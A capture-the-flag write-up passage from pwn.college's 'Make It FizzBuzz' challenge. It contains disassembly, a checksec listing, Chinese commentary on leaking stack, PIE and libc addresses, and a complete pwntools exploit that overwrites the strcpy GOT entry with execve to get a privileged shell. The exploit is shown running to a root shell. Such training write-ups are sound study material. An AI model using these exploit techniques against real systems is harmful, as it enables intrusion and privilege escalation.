[*] [+] Stack Leaked! buf address: 0x7fff4b678610
[*] [+] PIE Leaked! base address: 0x596805058000
[*] Switching to interactive mode
[*] Process '/challenge/does-it-buzz' stopped with exit code 0 (pid 209)
You entered: Xɒ\x05\x05hY
You win! Here is your flag:
pwn.college{*********************************************}


### Goodbye!
[*] Got EOF while reading in interactive
$

Make It FizzBuzz

hacker@program-security~make-it-fizzbuzz:~$ r2 -A -q -c "pdf @ sym.challenge" /challenge/make-it-fizbuzz
┌ 545: sym.challenge (char **arg1, char **arg2, int64_t arg3);
│ `- args(rdi, rsi, rdx) vars(14:sp[0x10..0x70])
│           0x000012d4      f30f1efa       endbr64
│           0x000012d8      55             push rbp
│           0x000012d9      4889e5         mov rbp, rsp
│           0x000012dc      4883ec70       sub rsp, 0x70
│           0x000012e0      897dac         mov dword [var_54h], edi    ; arg1
│           0x000012e3      488975a0       mov qword [var_60h], rsi    ; arg2
│           0x000012e7      48895598       mov qword [var_68h], rdx    ; arg3
│           0x000012eb      64488b0425..   mov rax, qword fs:[0x28]
│           0x000012f4      488945f8       mov qword [canary], rax
│           0x000012f8      31c0           xor eax, eax
│           0x000012fa      48c745b000..   mov qword [buf], 0
│           0x00001302      48c745b800..   mov qword [var_48h], 0
│           0x0000130a      48c745c000..   mov qword [var_40h], 0
│           0x00001312      48c745c800..   mov qword [var_38h], 0
│           0x0000131a      48c745d000..   mov qword [var_30h], 0
│           0x00001322      48c745d800..   mov qword [var_28h], 0
│           0x0000132a      48c745e000..   mov qword [src], 0
│           0x00001332      48c745e800..   mov qword [dest], 0
│           0x0000133a      488d45b0       lea rax, [buf]
│           0x0000133e      4883c004       add rax, 4
│           0x00001342      488945e8       mov qword [dest], rax
│           0x00001346      488d45b0       lea rax, [buf]
│           0x0000134a      4883c014       add rax, 0x14
│           0x0000134e      488945e0       mov qword [src], rax
│           0x00001352      c745dc0000..   mov dword [var_24h], 0
│           0x00001359      c745b01000..   mov dword [buf], 0x10
│           0x00001360      488d45b0       lea rax, [buf]
│           0x00001364      4883c024       add rax, 0x24
│           0x00001368      c70042757a7a   mov dword [rax], 0x7a7a7542 ; 'Buzz'
│                                                                      ; [0x7a7a7542:4]=-1
│           0x0000136e      66c740040a00   mov word [rax + 4], 0xa
│           0x00001374      488d3d920c..   lea rdi, str.Welcome_to_Fizz_Buzz_ ; 0x200d ; "Welcome to Fizz Buzz!" ; const char *s
│           0x0000137b      e880fdffff     call sym.imp.puts           ; int puts(const char *s)
│           0x00001380      c745dc0000..   mov dword [var_24h], 0
│       ┌─< 0x00001387      e944010000     jmp 0x14d0
│       │   ; CODE XREF from sym.challenge @ 0x14d8(x)
│      ┌──> 0x0000138c      8b55dc         mov edx, dword [var_24h]
│      ╎│   0x0000138f      4863c2         movsxd rax, edx
│      ╎│   0x00001392      4869c08988..   imul rax, rax, 0xffffffff88888889
│      ╎│   0x00001399      48c1e820       shr rax, 0x20
│      ╎│   0x0000139d      01d0           add eax, edx
│      ╎│   0x0000139f      c1f803         sar eax, 3
│      ╎│   0x000013a2      89c1           mov ecx, eax
│      ╎│   0x000013a4      89d0           mov eax, edx
│      ╎│   0x000013a6      c1f81f         sar eax, 0x1f
│      ╎│   0x000013a9      29c1           sub ecx, eax
│      ╎│   0x000013ab      89c8           mov eax, ecx
│      ╎│   0x000013ad      89c1           mov ecx, eax
│      ╎│   0x000013af      c1e104         shl ecx, 4
│      ╎│   0x000013b2      29c1           sub ecx, eax
│      ╎│   0x000013b4      89d0           mov eax, edx
│      ╎│   0x000013b6      29c8           sub eax, ecx
│      ╎│   0x000013b8      85c0           test eax, eax
│     ┌───< 0x000013ba      7510           jne 0x13cc
│     │╎│   0x000013bc      488d05bd2c..   lea rax, obj.fuzzbuzz       ; 0x4080 ; "FizzBuzz\n"
│     │╎│   0x000013c3      488945e0       mov qword [src], rax
│    ┌────< 0x000013c7      e980000000     jmp 0x144c
│    ││╎│   ; CODE XREF from sym.challenge @ 0x13ba(x)
│    │└───> 0x000013cc      8b4ddc         mov ecx, dword [var_24h]
│    │ ╎│   0x000013cf      4863c1         movsxd rax, ecx
│    │ ╎│   0x000013d2      4869c05655..   imul rax, rax, 0x55555556
│    │ ╎│   0x000013d9      48c1e820       shr rax, 0x20
│    │ ╎│   0x000013dd      4889c2         mov rdx, rax
│    │ ╎│   0x000013e0      89c8           mov eax, ecx
│    │ ╎│   0x000013e2      c1f81f         sar eax, 0x1f
│    │ ╎│   0x000013e5      89d6           mov esi, edx
│    │ ╎│   0x000013e7      29c6           sub esi, eax
│    │ ╎│   0x000013e9      89f0           mov eax, esi
│    │ ╎│   0x000013eb      89c2           mov edx, eax
│    │ ╎│   0x000013ed      01d2           add edx, edx
│    │ ╎│   0x000013ef      01c2           add edx, eax
│    │ ╎│   0x000013f1      89c8           mov eax, ecx
│    │ ╎│   0x000013f3      29d0           sub eax, edx
│    │ ╎│   0x000013f5      85c0           test eax, eax
│    │┌───< 0x000013f7      750d           jne 0x1406
│    ││╎│   0x000013f9      488d05782c..   lea rax, obj.fizz           ; 0x4078 ; "Fizz\n"
│    ││╎│   0x00001400      488945e0       mov qword [src], rax
│   ┌─────< 0x00001404      eb46           jmp 0x144c
│   │││╎│   ; CODE XREF from sym.challenge @ 0x13f7(x)
│   ││└───> 0x00001406      8b4ddc         mov ecx, dword [var_24h]
│   ││ ╎│   0x00001409      4863c1         movsxd rax, ecx
│   ││ ╎│   0x0000140c      4869c06766..   imul rax, rax, 0x66666667
│   ││ ╎│   0x00001413      48c1e820       shr rax, 0x20
│   ││ ╎│   0x00001417      89c2           mov edx, eax
│   ││ ╎│   0x00001419      d1fa           sar edx, 1
│   ││ ╎│   0x0000141b      89c8           mov eax, ecx
│   ││ ╎│   0x0000141d      c1f81f         sar eax, 0x1f
│   ││ ╎│   0x00001420      29c2           sub edx, eax
│   ││ ╎│   0x00001422      89d0           mov eax, edx
│   ││ ╎│   0x00001424      89c2           mov edx, eax
│   ││ ╎│   0x00001426      c1e202         shl edx, 2
│   ││ ╎│   0x00001429      01c2           add edx, eax
│   ││ ╎│   0x0000142b      89c8           mov eax, ecx
│   ││ ╎│   0x0000142d      29d0           sub eax, edx
│   ││ ╎│   0x0000142f      85c0           test eax, eax
│   ││┌───< 0x00001431      750e           jne 0x1441
│   │││╎│   0x00001433      488d45b0       lea rax, [buf]
│   │││╎│   0x00001437      4883c024       add rax, 0x24
│   │││╎│   0x0000143b      488945e0       mov qword [src], rax
│  ┌──────< 0x0000143f      eb0b           jmp 0x144c
│  ││││╎│   ; CODE XREF from sym.challenge @ 0x1431(x)
│  │││└───> 0x00001441      488d05402c..   lea rax, obj.nothing        ; 0x4088 ; "\n"
│  │││ ╎│   0x00001448      488945e0       mov qword [src], rax
│  │││ ╎│   ; CODE XREFS from sym.challenge @ 0x13c7(x), 0x1404(x), 0x143f(x)
│  └└└────> 0x0000144c      8b45dc         mov eax, dword [var_24h]
│      ╎│   0x0000144f      89c6           mov esi, eax
│      ╎│   0x00001451      488d3dcb0b..   lea rdi, str._d:            ; 0x2023 ; "%d: " ; const char *format
│      ╎│   0x00001458      b800000000     mov eax, 0
│      ╎│   0x0000145d      e8befcffff     call sym.imp.printf         ; int printf(const char *format)
│      ╎│   0x00001462      488d45b0       lea rax, [buf]
│      ╎│   0x00001466      4883c014       add rax, 0x14
│      ╎│   0x0000146a      ba54000000     mov edx, 0x54               ; 'T' ; size_t nbyte
│      ╎│   0x0000146f      4889c6         mov rsi, rax                ; void *buf
│      ╎│   0x00001472      bf00000000     mov edi, 0                  ; int fildes
# buffer overflow
│      ╎│   0x00001477      e8b4fcffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
│      ╎│   0x0000147c      488d45b0       lea rax, [buf]
│      ╎│   0x00001480      4883c014       add rax, 0x14
│      ╎│   0x00001484      4889c6         mov rsi, rax
│      ╎│   0x00001487      488d3d9a0b..   lea rdi, str.You_entered:__s_n ; 0x2028 ; "You entered: %s\n" ; const char *format
│      ╎│   0x0000148e      b800000000     mov eax, 0
│      ╎│   0x00001493      e888fcffff     call sym.imp.printf         ; int printf(const char *format)
│      ╎│   0x00001498      c645c400       mov byte [var_3ch], 0 # '\x00'
│      ╎│   0x0000149c      488b55e0       mov rdx, qword [src]
│      ╎│   0x000014a0      488b45e8       mov rax, qword [dest]
│      ╎│   0x000014a4      4889d6         mov rsi, rdx                ; const char *src
│      ╎│   0x000014a7      4889c7         mov rdi, rax                ; char *dest
# strcpy
│      ╎│   0x000014aa      e841fcffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
│      ╎│   0x000014af      488b45e8       mov rax, qword [dest]
│      ╎│   0x000014b3      4889c6         mov rsi, rax
│      ╎│   0x000014b6      488d3d7c0b..   lea rdi, str.Correct_answer:__s_n ; 0x2039 ; "Correct answer: %s\n" ; const char *format
│      ╎│   0x000014bd      b800000000     mov eax, 0
│      ╎│   0x000014c2      e859fcffff     call sym.imp.printf         ; int printf(const char *format)
│      ╎│   0x000014c7      8b45dc         mov eax, dword [var_24h]
│      ╎│   0x000014ca      83c001         add eax, 1
│      ╎│   0x000014cd      8945dc         mov dword [var_24h], eax
│      ╎│   ; CODE XREF from sym.challenge @ 0x1387(x)
│      ╎└─> 0x000014d0      8b55dc         mov edx, dword [var_24h]
│      ╎    0x000014d3      8b45b0         mov eax, dword [buf]
│      ╎    0x000014d6      39c2           cmp edx, eax
│      └──< 0x000014d8      0f8caefeffff   jl 0x138c
│           0x000014de      90             nop
│           0x000014df      488b7df8       mov rdi, qword [canary]
│           0x000014e3      6448333c25..   xor rdi, qword fs:[0x28]
│       ┌─< 0x000014ec      7405           je 0x14f3
│       │   0x000014ee      e81dfcffff     call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
│       │   ; CODE XREF from sym.challenge @ 0x14ec(x)
│       └─> 0x000014f3      c9             leave
└           0x000014f4      c3             ret

hacker@program-security~make-it-fizzbuzz:~$ checksec /challenge/make-it-fizbuzz
[*] '/challenge/make-it-fizbuzz'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO # GOT is writable
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled # can't overwrite return address
    IBT:        Enabled
    Stripped:   No

1. 泄露 Stack & PIE：利用 FizzBuzz 机制泄露栈指针和程序基址。
2. 泄露 Libc ：将 src 指向 printf 的 GOT 表，将 dest 指向栈上的安全区（比如 buf）。strcpy 会把 libc 地址复制过来，紧接着的 printf("Correct answer: %s\n", dest) 就会把 libc 地址泄露给终端
3. 劫持 GOT 表：有了 libc 基址，算出 execve 的真实地址。再次利用 strcpy，把 execve 的地址写进 strcpy 自己的 GOT 表里

汇编代码里调用 strcpy 的传参过程，rsi 和 rdx 都被赋予了 src 的值。

这意味着，如果我们将 dest 指向字符串 "/bin/sh"，将 src 指向一个指针数组 ["/bin/sh", "-p", NULL]：

rdi (可执行文件路径) = "/bin/sh"

rsi (命令行参数 argv) = ["/bin/sh", "-p", NULL]

rdx (环境变量 envp) = ["/bin/sh", "-p", NULL]

最核心的优势：使用 execve 并通过 argv 传入 -p 参数，可以直接让 /bin/sh 保持 SUID 的 Root 权限

#!/usr/bin/env python3
from pwn import *

context.arch = "amd64"
context.log_level = "info"

def run_exploit():
    elf = ELF("/challenge/make-it-fizbuzz")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    p = process(elf.path)

    # 推进到第 5 次循环
    for i in range(6):
        p.recvuntil(f"{i}: ".encode())
        if i < 5:
            p.send(b"A")

    # --- 阶段一：Stack Leak ---
    payload_leak_stack = b"A" * 24 + b"\xff\xff\xff\xff"
    p.send(payload_leak_stack)
    p.recvuntil(b"You entered: " + payload_leak_stack)
    stack_leak = u64(p.recv(6).ljust(8, b"\x00"))
    buf_addr = stack_leak - 0x24

    # --- 阶段二：PIE Leak ---
    p.recvuntil(b"0: ")
    payload_leak_pie = b"A" * 24 + b"\xff\xff\xff\xff"
    p.send(payload_leak_pie)
    p.recvuntil(b"You entered: " + payload_leak_pie)
    pie_leak = u64(p.recv(6).ljust(8, b"\x00"))

    pie_base = pie_leak - 0x4080

    if pie_base < 0x500000000000 or pie_base > 0x600000000000:
        log.warning(f"检测到 Null Byte")
        p.close()
        return False

    elf.address = pie_base
    log.info(f"[+] Stack Leaked! buf address: {hex(buf_addr)}")
    log.info(f"[+] PIE Leaked! base address: {hex(pie_base)}")

    # --- 阶段三：Libc Leak ---
    p.recvuntil(b"0: ")
    printf_got = elf.got['printf']
    dest_safe = buf_addr

    payload_libc = flat({
        0: b"X",
        24: p32(0),
        28: p64(printf_got),
        36: p64(dest_safe)
    })
    p.send(payload_libc)

    p.recvuntil(b"Correct answer: ")
    libc_leak = u64(p.recvuntil(b"\n", drop=True).ljust(8, b"\x00"))
    libc.address = libc_leak - libc.sym['printf']
    log.info(f"[+] Libc Leaked! base address: {hex(libc.address)}")

    # --- 阶段四：覆写 strcpy GOT 为 execve ---
    p.recvuntil(b"1: ")

    execve_addr = libc.sym['execve']
    strcpy_got = elf.got['strcpy']
    # 将 execve 的地址放在 84 字节缓冲区的最后面
    src_execve_ptr = buf_addr + 0x14 + 44

    payload_got = flat({
        0: b"X",
        24: p32(1),
        28: p64(src_execve_ptr),
        36: p64(strcpy_got),
        44: p64(execve_addr)
    })
    p.send(payload_got)

    # --- 阶段五：execve 触发 ---
    # 此时，调用 strcpy 等同于调用 execve。
    p.recvuntil(b"2: ")

    # 我们只有 84 (0x54) 字节的写入空间
    # 把指针控制变量放在中间，把字符串和数组放在尾部
    input_start = buf_addr + 0x14
    binsh_str = input_start + 44
    p_str     = input_start + 52
    argv_arr  = input_start + 60

    payload_execve = flat({
        0: b"X",                # 首字节强制清零
        24: p32(2),
        28: p64(argv_arr),      # src -> 作为 rsi (argv) 和 rdx (envp) 传入 execve
        36: p64(binsh_str),     # dest -> 作为 rdi (path) 传入 execve
        44: b"/bin/sh\x00",
        52: b"-p\x00\x00\x00\x00\x00\x00",
        60: p64(binsh_str),     # argv[0]
        68: p64(p_str),         # argv[1]
        76: p64(0)              # argv[2] (NULL 结尾)
    })
    p.send(payload_execve)

    log.success("Execve payload")
    p.interactive()
    return True

if __name__ == "__main__":
    while not run_exploit():
        pass

hacker@program-security~make-it-fizzbuzz:~$ python a.py
[*] '/challenge/make-it-fizbuzz'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
[+] Starting local process '/challenge/make-it-fizbuzz': pid 261
[*] [+] Stack Leaked! buf address: 0x7ffe1475c400
[*] [+] PIE Leaked! base address: 0x5feb4a201000
[*] [+] Libc Leaked! base address: 0x7d053c9a7000
[+] Execve payload triggered! You now have a pure Root Shell. Don't ruin it.
[*] Switching to interactive mode
You entered: Xaaabaaacaaadaaaeaaafaaa\x02
$ cat /flag
pwn.college{*********************************************}
$